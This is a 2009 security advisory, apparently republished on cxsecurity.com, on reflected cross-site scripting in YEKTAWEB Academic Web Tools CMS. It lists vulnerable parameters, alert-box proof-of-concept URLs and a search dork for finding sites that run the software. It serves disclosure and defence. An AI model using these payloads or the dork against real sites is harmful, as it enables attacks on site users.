YEKTA WEB Academic Web Tools CMS Multiple XSS

2009-03-02 / 2009-03-03
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

============================================ IUT-CERT ============================================ Title: Academic Web Tools CMS Multiple XSS Vendor: www.yektaweb.com Vulnerable Version: 1.5.7 and priors Type: XSS Fix: N/A Dork: AWT YEKTA ============================================ nsec.ir ============================================ Description: ------------------ YEKTAWEB Academic Web Tools is a Persian Content Management System (CMS) for managing university affairs such as conferences, journals and etc. The built-in filter of this package can not prevent XSS attack on some parameters. Vulnerabilities: ------------------ 1- Cross Site Scripting (XSS) in "/page.php" in "sid","logincase" and "redirect" parameters. http://yoursite/page.php?sid=[XSS] http://yoursite/page.php?logincase=[XSS] http://yoursite/page.php?redirect=[XSS] 2- Cross Site Scripting (XSS) in "/page_arch.php" in "sid","logincase" and "redirect" parameters. http://yoursite/page_arch.php?sid=[XSS] http://yoursite/page_arch.php?logincase=[XSS] http://yoursite/page_arch.php?redirect=[XSS] 3- Cross Site Scripting (XSS) in "/login.php" in "sid" ,"logincase" and "redirect" parameters. http://yoursite/login.php?sid=[XSS] http://yoursite/login.php?logincase=[XSS] http://yoursite/login.php?redirect=[XSS] 4- Cross Site Scripting (XSS) in "/download.php" in "sid" ,"logincase" and "redirect" parameters. http://yoursite/login.php?sid=[XSS] http://yoursite/login.php?logincase=[XSS] http://yoursite/login.php?redirect=[XSS] Exploit/PoC: ------------------ Example: http://yoursite/login.php?slct_pg_id=53&sid=1*/--></script><script>alert(188017)</script>&slc_lang=fa http://yoursite/page_arch.php?slc_lang=fa&sid=1&logincase=*/--></script><script>alert(188017)</script> http://yoursite/page.php?sid=1&slc_lang=en&redirect=*/--></script><script>alert(188017)</script> Solution: ------------------ Input Validation Filter should be patched. Credit: ------------------ Isfahan University of Technology - Computer Emergency Response Team Thanks to : M. R. Faghani, N. Fathi, E. Aerabi, E. Jafari

References:

http://seclists.org/bugtraq/2009/Mar/0005.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top